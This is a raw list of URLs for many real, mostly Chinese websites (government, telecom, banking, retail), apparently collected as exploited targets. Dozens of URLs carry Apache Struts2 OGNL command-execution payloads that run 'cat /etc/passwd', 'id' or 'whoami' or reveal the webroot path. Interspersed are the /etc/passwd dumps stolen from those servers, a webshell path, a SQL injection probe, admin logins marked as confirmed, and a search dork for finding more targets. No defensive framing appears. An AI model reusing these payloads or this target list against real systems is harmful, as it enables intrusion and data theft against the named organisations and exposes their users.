http://nx.si.gov.cn:809/jmx-console/ http://diy.jd.com下的 http://www.ubsclub.com/DFN/member/Login.action http://job.10086.cn http://www.gzrch.com/login/Cms.do http://zj.10086.cn/ http://vpn.xztelecom.cn/support/card/cardBalance.action 
http://101568.com/front/index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://chat1.jd.com/api/checkByJd2.action http://user1.baihe.com/MyBaihe/lookAtMe.action,存在命令执行漏洞 http://passport.ourgame.com/sinalogin.do?type=sina&nexturl= http://fund.yeepay.com/openAccount/register!toRegister.action http://union.sogou.com/ http://www.led-konka.com/pro_cat/55.shtml http://www.schj.gov.cn/manageEnpro/enpromeet_getMeetinfo.action http://hx.118114.cn/piao/ych/web/index.action http://www.renrendai.com/lend/detailPage.action?loanId=81238 http://117.34.78.222/login/login.do http://jdwt.dahe.cn/focus/admin/login.do http://admin.yeyou365.com/webTemplate/index.action http://www.zj.bank-of-china.com/cj/promote/index.action http://card.eastday.com/index.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.lszwdt.gov.cn/index!index.action http://www.wzggzy.net/index!index.action http://www.naggzy.gov.cn/index!index.action http://ztb.pinghu.gov.cn/index!index.action http://www.ycggzy.gov.cn/index!index.action http://ggzy.yishui.gov.cn/index!index.action http://www.whggzy.com/index!index.action inurl:index!index.action 
http://article.zhaopin.com/payquery/index.do https://www.shfft.com/ http://demo.cscb.cn/perbank_demo/cert/userCertDownload!keySelect.action http://demo.cscb.cn/perbank_demo/manage/userRegister.action http://zj.yesky.com http://zs.ofpay.com/system/go2FrameHandle.action http://www.kdlins.com.cn/ http://oopka.com/forum.php?mod=viewthread&tid=1714 http://ec.yto.net.cn/login_goLogin.action http://ec.yto.net.cn/login_goLogin.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://rdc.haier.net/security/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.ha.chinamobile.com/tiyan/comment/index.action http://passport.m.jd.com/user/login.action 
http://yjt.10086.cn/index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.taoguba.com.cn/index.action?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 http://m.fj.189.cn/storeFront/index/loginAction!login.action http://manager.17k.com/login.action http://www.360youtu.com/uwp/web/login.jsp https://www.firstback.com.tw/ http://ditu.10086.cn/getPhoneSelectList.action?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 www.cwts.com.cn http://library.xmu.edu.cn/portal/notice.asp?id=4591 
http://pop.coo8.com/goods/descInfo_connect_goodsInfo.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://datacenter.mep.gov.cn/ http://job.bjcsair.com/index.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.wodingche.com/frontend/holiday/holiday-auto!list.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28%22id%22%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://219.142.70.7:7090/telecomoa/login.jsp http://www.e159.com/activity/ticketpoint!index.action http://www.sepb.gov.cn/vehicle/index.action http://www.yjrcb.cn/fckeditor/editor/fckeditor.html http://ecard.nenu.edu.cn/EcardDevelopment/index/index_index.action http://bbs.lusen.com/ http://bbs.lusen.com/data/attachment/album/201307/18/064651ri35533vmmmayjyw.jpg/1.php http://www.hoolai.com/test.jsp www.hoolai.com/sango.action 
http://www.hoolai.com/sango.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://poc.10086.cn/Provisioning/action/toWap.action http://dove.zol.com.cn/saas/editUserInviteLogin.action http://shop.samsung.com.cn/message/news_detail.action http://www.gstzsb.com/Index.aspx http://mis.gstzsb.com/LoginGS.aspx(验证了管理员:admin http://qp.gstzsb.com/Manager/login.aspx(验证了管理员:lip http://dt.gstzsb.com/Manager/Login.aspx(验证了管理员:admin http://pssp.ceair.com/awartlot/awartlotAction!getAwartlots.action http://mall.mama100.com/index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28%22whoami%22%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.zs.gov.cn/english/features/hometown/view/index.action http://www.casad.ac.cn/document.action http://www.mmtv.com.cn/Control/EpicEdit/admin/login.aspx http://wssb.jsfda.gov.cn/zwdt/index.action http://www.shcb.org.cn/index.action http://fm.tom.com/1.jsp http://fm.tom.com/login-share/binding/bindingSuccess.action root:x:0:0:root:/root:/bin/bash sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin king:x:1000:1000:king,,,:/home/king:/bin/bash Debian-exim:x:102:104::/var/spool/exim4:/bin/false statd:x:103:65534::/var/lib/nfs:/bin/false web:x:1001:1001::/home/web:/usr/local/bash-4.1/bin/bash 
nagios:x:1002:1002::/home/nagios:/usr/local/bash-4.1/bin/bash http://fm.tom.com/login-share/binding/bindingSuccess.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28%22id%22%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://219.136.241.156:8089/gzct4/wsjdk/index.action http://xkpt.moc.gov.cn/default/index.action http://www.sinosig.com/preinsu_get.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]%20%20{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20%20%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%20%20%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%20%20%23matt.getWriter%28%29.close%28%29 http://www.gdmec.net/phx/bidIndex.action http://buy.yesky.com/j4nker.jsp http://95588.81666.net/index.action http://www.81666.net/cms/index.action http://www.f-young.cn/news/loadNewsForDetail.action https://passport.baidu.com/v2/api/?getapi&apiver=v3 http://www.xj96566.com/IOC/client/login!index.action http://vod.e-learning.cnpc.com.cn/app/cms/company.action https://www.soopay.net/mymoney/index.do http://down.gionee.com/gineedown/index.action http://im.ct10000.com/index!serviceSelfYW.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync 
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin imhtp:x:500:500::/home/imhtp:/bin/bash nagios:x:501:501::/home/nagios:/bin/bash http://e159.com/index.action http://s.lakala.com/TradeDetailAction.action http://s.lakala.com/logout.action http://s.lakala.com/1.txt http://ivideo.gd.vnet.cn/index!index.action http://smezj.sme.gov.cn/index.action http://smezj.sme.gov.cn/index.action http://211.167.243.131/indexAction!login.action http://218.203.214.57:8080/ADC20/sys/Logout.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown 
halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin ident:x:100:101::/home/ident:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin desktop:x:80:80:desktop:/var/lib/menu/kde:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin mailman:x:41:41:GNU Manager:/var/mailman:/sbin/nologin mqm:x:501:501::/home/mqm:/bin/bash mqbrkrs:x:502:502::/home/mqbrkrs:/bin/bash adc:x:503:503::/home/adc:/bin/bash xf:x:504:504::/home/xf:/bin/bash ams:x:505:505::/home/ams:/bin/bash samcheck:x:506:506::/home/samcheck:/bin/bash ssh:x:507:507::/home/ssh:/bin/bash admin:x:0:0::/home/admin:/bin/bash 
http://61.168.11.30:8011/AirChargeWeb/login!login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://he.189.cn/self_service/logon.action http://he.189.cn/self_service/logon.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://gfp.fast.gti.cn/system/gotoLogin.action url:http://kf.sf-express.com/css/myquery/queryWQSBill.action http://www.gdzs.si.gov.cn/main/open/view/index.action http://www.zsaudit.gov.cn/main/open/view/index.action http://i.renren.com/index.action http://love2.ourgame.com/dsself/self/Bean!gift.action http://love2.ourgame.com/dsself/1.txt http://mail.bbn.com.cn/mail/login.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin 
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin ais:x:39:39:openais Framework:/:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin piranha:x:60:60::/etc/sysconfig/ha:/sbin/nologin luci:x:101:104::/var/lib/luci:/sbin/nologin ricci:x:102:105:ricci user:/var/lib/ricci:/sbin/nologin support:x:600:600::/opt/support:/bin/bash aimc:x:601:600::/opt/aimc:/bin/bash ainms:x:602:600::/opt/ainms:/bin/bash oracle:x:603:600::/opt/oracle:/bin/bash aisp-act:x:604:600::/opt/aisp-act:/bin/bash aimccu:x:605:600::/opt/aimccu:/bin/bash momentum:x:606:600::/opt/momentum:/bin/bash ecspread:x:103:601::/var/log/spread:/bin/sh ecuser:x:104:602::/var/spool/ecelerity:/bin/sh msyspg:x:105:603::/var/log/msyspg:/bin/sh wangyuan:x:607:600::/opt/wangyuan:/bin/bash 
hanxiaofeng:x:608:600::/opt/hanxiaofeng:/bin/bash huangwei:x:609:600::/opt/huangwei:/bin/bash mafang:x:610:600::/opt/mafang:/bin/bash Admin:x:611:600::/opt/Admin:/bin/bash http://wap.jx.10086.cn/wap/wap/homePage.action http://sc2rep.replays.net http://xt.ztgame.com/activity/beatfpic/query.php?id=-1%20or%2060%20%3d%2058 http://www.gdjky.com/index.html http://www.gdjky.com/ucms/admin/index.php?o=sys::login http://www.qic.com.cn/help/joinClubView.action www.deppon.com http://dev.app.yule.sohu.com/videoStatPlatform/login.action http://www.epailive.com/bottomAction_bottom_include.do http://b2g.ceair.com/MUB2G/login/loginAction_initSession.do http://crm.263.net/webContract_addWebContract.do http://pcc.263.net/PCC/loginMail.do http://wm2gmail.263.net/mail/domainLocation/domainLocationAction_LoginDispacher.do http://wmbeta.263.net/mail/login/opt/loginAction_loginOpt.do http://wm1gmail.263.net/mail/login/opt/loginAction_loginOpt.do http://ss.263.net/SelfService/register/userRegister.action http://macom.263.net/user.action http://dns.263.net/system/login_login.action http://vboss.263.net:8081/internetBankingPay/internetBankingPay_aliPay.action http://t.zhenai.com/activity/loverTopic.do http://m.zhenai.com/index.do http://xfgd.zhenai.com/activity/activityIndex.do http://hao.tcl.com/view/product/product!info.action https://e.ccb-life.com.cn/sales/service/onlineService_goPolicyList.action http://gcjs.kaifeng.gov.cn/ http://autoscm.lifan.com/login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.apache.org/server-status http://ad.msn.cn/login!welcome.action 
http://wapgs.189.cn/wap/index/index.action http://pai.189.cn/ipaipai/portal/index/firstPage.action http://www.4008836836.com/martActivity/loveAppointment/index.action http://wp.jiangsu.118114.cn:8080/sdm/system/loginAction!adminLogin.action http://m.yule.sohu.com/client/tvnews/view.action http://60.190.57.194/webapp/xssb/zhjfwwcx/index.action http://gs.189.cn/webShop/preety/preetyNumberList.action http://www.china-cbs.com/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://nj.lsaic.gov.cn:7011/i!index.action http://www.xz.189.cn/shop/combo.action http://fj.189.cn/iphone5/query_order.action http://sn.189.cn/shop/phoneArea/init.action http://www7.chinatelecom.com.cn/hr/pb/regi.do http://rs.hntelecom.net.cn/hr_external_system/viewRecruitNotice.do http://agent.sipo.gov.cn:8000/sipo/index.action http://tips.passport.pptv.com/getUsertipNum.do http://tips.passport.pptv.com/aaa.txt http://admin.qianpin.com/zxsale-sys2/portal/login.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP 
User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin mysql:x:500:500::/home/mysql:/bin/bash work:x:501:501::/home/work:/bin/bash rd:x:502:502::/home/rd:/bin/bash monitor:x:503:503::/home/monitor:/bin/bash apache:x:48:48:Apache:/var/www:/sbin/nologin chengwenhua:x:504:501::/home/chengwenhua:/bin/bash tianye:x:505:501::/home/tianye:/bin/bash qiaoweibo:x:506:501::/home/qiaoweibo:/bin/bash liran:x:507:507::/home/liran:/bin/bash https://dev.vmall.com/loginAction!login.action http://manage.youku.com/manager/editChildNews/tid/360/fid/50/pid/140/lang/en http://www.youku.com/about/en/press_release_view_140.html http://hd.jstv.com/xhsy/cont.aspx?id=235 http://mstore.wo.com.cn/activity/wjy.action http://www.dragonpass.com.cn/EN-news-index.action 
http://www.dragonpass.com.cn/EN-news-index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28%22id%22%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://211.103.182.67:8090/bgpc_ys/ysIndex/index.action http://maimai.12582.cn/ebs/index.action http://so.mydrivers.com/DriversClick.aspx?subclassid=101&type=classid http://www.hui12580.cn/index.action http://health.139life.com/login_login.action http://tjgl.scofcom.gov.cn/Investment/info/index.action http://wap.139nb.cn:8080/cmread/index.action http://www.sz-mtr.com/ZYKF/busi.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://jl.10155.net.cn:8086/activities_party/activity/index.action http://sfocs.sf-express.com/im-client/imclient/selfHelp.action http://bvs.haier.net/security/loginInit.action http://plc.fa.omron.com.cn/admin/login.action http://111.9.120.78/cdyx/ebusiness/web/photoweb!index.action http://219.144.196.194/index.action?key=yqrc0zzIhntOSHBkvVxfRt4XnN9N29jfiWuzmB6J774TApMvRxcGtA==&code=yqrc0zzIhntNbY+ZFyRL/xRd/cFy03pmXdSMVYddINM= http://124.133.53.182:8080/ http://124.133.53.182:8080/fckeditor/ 